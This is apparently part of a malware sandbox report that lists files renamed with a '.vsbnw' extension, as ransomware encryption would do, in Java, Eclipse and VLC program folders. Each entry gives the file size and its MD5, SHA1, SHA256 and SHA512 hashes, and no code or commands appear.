        Filesize

        12KB

        MD5

        8c8398eafd44dbfdbd9c616943ebbf2e

        SHA1

        5086051fdee11f9817617ded842fecaa8965e58d

        SHA256

        609c03b42ef3c746cdd8cf7255aa98f573c039af04e644549f2976ed96bfb9eb

        SHA512

        7b75e1befac578ab534b7467c8daf674c2ffb5b23c8057971b22a69da346b323c8c6dc422372a9e07b4c0a7ac8b3fcf15c9edb480d621b8c164f902a45bfc93b

        Download Submit

      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        12KB

        MD5

        a161dafbe7c05ba7ddf611b1716c67a8

        SHA1

        96228ce1e7ca55407b55c6b474ad63a524362582

        SHA256

        c5238e81c37fcbf3e7d8096e761d466559b0e05daa1934b8e4caf03e4ec60c7f

        SHA512

        f9880fe01c0ac4d9b95141769bcb3543d373c1794b37beb1d7bf067cde3c2dd4630806f962845ba7f32315a4aad3d2e304a31de8903c09e2a5e3cafd1c09e578

        Download Submit

      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        7KB

        MD5

        53f2c69e916a1dab76248df43aa031bd

        SHA1

        86d66a3dcfd6810a21014fa67ec12910b35d0a17

        SHA256

        f7fceb2193519470a82764e5b2a749ab5e0929fe3e998700e56a9c151a89fe61

        SHA512

        2c606d43c5b8d9953475c319a7adbbb56f3a75a22e9d77a0cb3a88da1f005ea7888b0efed663785f9948badadbf198013992fdcc6e63fd73913c0b41f0d59161

        Download Submit

      • C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        153B

        MD5

        1e9d8f133a442da6b0c74d49bc84a341

        SHA1

        259edc45b4569427e8319895a444f4295d54348f

        SHA256

        1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

        SHA512

        63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

        Download Submit

      • C:\Program Files\Java\jre7\lib\zi\EST.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        27B

        MD5

        a2abe32f03e019dbd5c21e71cc0f0db9

        SHA1

        25b042eb931fff4e815adcc2ddce3636debf0ae1

        SHA256

        27ba8b5814833b1e8e8b5d08246b383cb8a5fb7e74e237cdbcadf320e882ab78

        SHA512

        197c065b9c17c6849a15f45ac69dafa68aaa0b792219fedb153d146f23997bfa4fbc4127b1d030a92a4d7103bded76a1389df715b9539ea23ea21e6a4bb65fb2

        Download Submit

      • C:\Program Files\Java\jre7\lib\zi\Etc\GMT.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        27B

        MD5

        7da9aa0de33b521b3399a4ffd4078bdb

        SHA1

        f188a712f77103d544d4acf91d13dbc664c67034

        SHA256

        0a526439ed04845ce94f7e9ae55c689ad01e1493f3b30c5c2b434a31fa33a43d

        SHA512

        9d2170571a58aed23f29fc465c2b14db3511e88907e017c010d452ecdf7a77299020d71f8b621a86e94dd2774a5418612d381e39335f92e287a4f451ee90cfb6

        Download Submit

      • C:\Program Files\Java\jre7\lib\zi\HST.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        27B

        MD5

        715dc3fcec7a4b845347b628caf46c84

        SHA1

        1b194cdd0a0dc5560680c33f19fc2e7c09523cd1

        SHA256

        3144bc5353ebbd941cdccbbd9f5fb5a06f38abf5cc7b672111705c9778412d08

        SHA512

        72ab4b4ad0990cce0723a882652bf4f37aac09b32a8dd33b56b1fbf25ac56ae054328909efd68c8243e54e449d845fb9d53dd95f47eaaf5873762fcd55a39662

        Download Submit

      • C:\Program Files\Java\jre7\lib\zi\MST.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        27B

        MD5

        11f8e73ad57571383afa5eaf6bc0456a

        SHA1

        65a736dddd8e9a3f1dd6fbe999b188910b5f7931

        SHA256

        0e6a7f1ab731ae6840eacc36b37cbe3277a991720a7c779e116ab488e0eeed4e

        SHA512

        578665a0897a2c05eda59fb6828f4a9f440fc784059a5f97c8484f164a5fcec95274159c6ff6336f4863b942129cb884110d14c9bd507a2d12d83a4e17f596d2

        Download Submit

      • C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_AAAAAAAAAAA0.vsbnw
        Filesize

        614KB

        MD5

        1bcd19452a5fdffda64c832dbca81036

        SHA1

        bdd8bb2c420dd7a5a98b2c2e22df74ef35aa82a4

        SHA256

        8d56ffc5bbc17522b11925fb6b04782384d96d9616ab663e03f77c44367eb9a7

        SHA512

        704c1b5a998ff103b485e891d4c57ba048b27d67817df25d2b6541782788445c490ecda58d96f77dea77321a147d904329bad94084ac66a992d9bed6b4a04c7c

        Download Submit

      • C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo.WqGaUbftkGnNhxXpCiFHrrrejk0dlhXFYu2YXkDErLL_IAAAACAAAAA0.vsbnw
        Filesize

        616KB

        MD5

        2b4ff5d9fd295753ae7dce78308bf8fc

        SHA1

        be9150495347e810648d685b6193d9242e299d05

        SHA256

        0d01f969e6dc5f66756b2f5f7a4bf6779b6115116491792f8a06fb94e3fc7f03

        SHA512

        e0a78a885209ba9e5d9a240e0b6c187d7fb3dd7a27009e898b0ef473a9e19e63f00784c359002f9875a3844b68f53cfdd6033eed015382654441588640199812

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        0dd28b170311528bb2f6b4a9c3ab386e

        SHA1

        4d86c4491751b00304237d23b38633287b15e90c

        SHA256

        72775ed7c3332284a11180aae541db951281b79cf50564543af1ad8482d6a99d

        SHA512

        6889e7921e26840a77c1b7ae9716474e466dda0fbf6b13912dd259a789e85d9d8affbb4179eecaa9ca8b62e71837216dbb80fe03e3f7366fd20a18279e3baea8

        Download Submit